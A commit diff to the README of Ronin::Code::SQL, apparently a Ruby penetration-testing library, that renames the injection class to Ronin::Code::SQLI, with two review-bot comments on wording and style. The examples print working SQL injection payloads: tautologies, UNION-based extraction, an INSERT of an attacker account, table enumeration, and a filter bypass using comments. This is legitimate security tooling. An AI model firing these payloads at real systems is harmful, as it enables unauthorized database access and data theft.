Use the new Ronin::Code::SQLI constant in the Examples.
postmodern committed Jun 27, 2023
1 parent 65e4f9e commit 087164a
Showing 1 changed file with 12 additions and 12 deletions.
24 changes: 12 additions & 12 deletions README.md
Expand Up @@ -61,7 +61,7 @@ string.sql_decode
Injecting a `1=1` test into a Integer comparison:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.or { 1 == 1 }
puts sqli
# 1 OR 1=1
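Review bot: the context line at the top of this hunk reads "Injecting a `1=1` test into a Integer comparison:", which should say "an Integer"; it is worth fixing while the example under it is being touched. Since the commit message calls `Ronin::Code::SQLI` a new constant and every README example now uses it, consider adding one sentence near this first example that states how it relates to `Ronin::Code::SQL::Injection`, so readers who know the longer name can tell whether it still works.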
Expand All @@ -70,7 +70,7 @@ puts sqli
Injecting a `1=1` test into a String comparison:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.or { string(1) == string(1) }
puts sqli
# 1' OR '1'='1
Expand All @@ -79,7 +79,7 @@ puts sqli
Columns:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { admin == 1 }
puts sqli
# 1 AND admin=1
Expand All @@ -88,7 +88,7 @@ puts sqli
Clauses:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.or { 1 == 1 }.limit(0)
puts sqli
# 1 OR 1=1 LIMIT 0
Expand All @@ -97,7 +97,7 @@ puts sqli
Statements:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { 1 == 0 }
sqli.insert.into(:users).values('hacker','passw0rd','t')
puts sqli
Expand All @@ -107,7 +107,7 @@ puts sqli
Sub-Statements:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union { select(1,2,3,4,id).from(users) }
puts sqli
# 1 UNION SELECT (1,2,3,4,id) FROM users
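Review bot: `from(users)` in the `sqli.union { select(1,2,3,4,id).from(users) }` line passes the table as a bare identifier, while the `into(:users)` and `from(:users)` examples elsewhere in this diff pass a Symbol. Pick one form for the README, or, if both are accepted, add a short comment saying so. The same line appears again in the final `/**/` hunk.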
Expand All @@ -116,7 +116,7 @@ puts sqli
Test if a table exists:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and { select(count).from(:users) == 1 }
puts sqli
# 1 AND (SELECT COUNT(*) FROM users)=1
Expand All @@ -125,7 +125,7 @@ puts sqli
Create errors by using non-existent tables:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.and { non_existent_table == '1' }
puts sqli
# 1' AND non_existent_table='1
Expand All @@ -134,7 +134,7 @@ puts sqli
Dumping all values of a column:

```ruby
sqli = Ronin::Code::SQL::Injection.new(escape: :string)
sqli = Ronin::Code::SQLI.new(escape: :string)
sqli.or { username.is_not(null) }.or { username == '' }
puts sqli
# 1' OR username IS NOT NULL OR username='
Expand All @@ -143,7 +143,7 @@ puts sqli
Enumerate through database table names:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.and {
ascii(
lower(
Expand All @@ -160,7 +160,7 @@ puts sqli
Find user supplied tables via the `sysObjects` table:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union_all {
select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
}
Expand All @@ -171,7 +171,7 @@ puts sqli.to_sql(terminate: true)
Bypass filters using `/**/` instead of spaces:

```ruby
sqli = Ronin::Code::SQL::Injection.new
sqli = Ronin::Code::SQLI.new
sqli.union { select(1,2,3,4,id).from(users) }
puts sqli.to_sql(space: '/**/')
# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users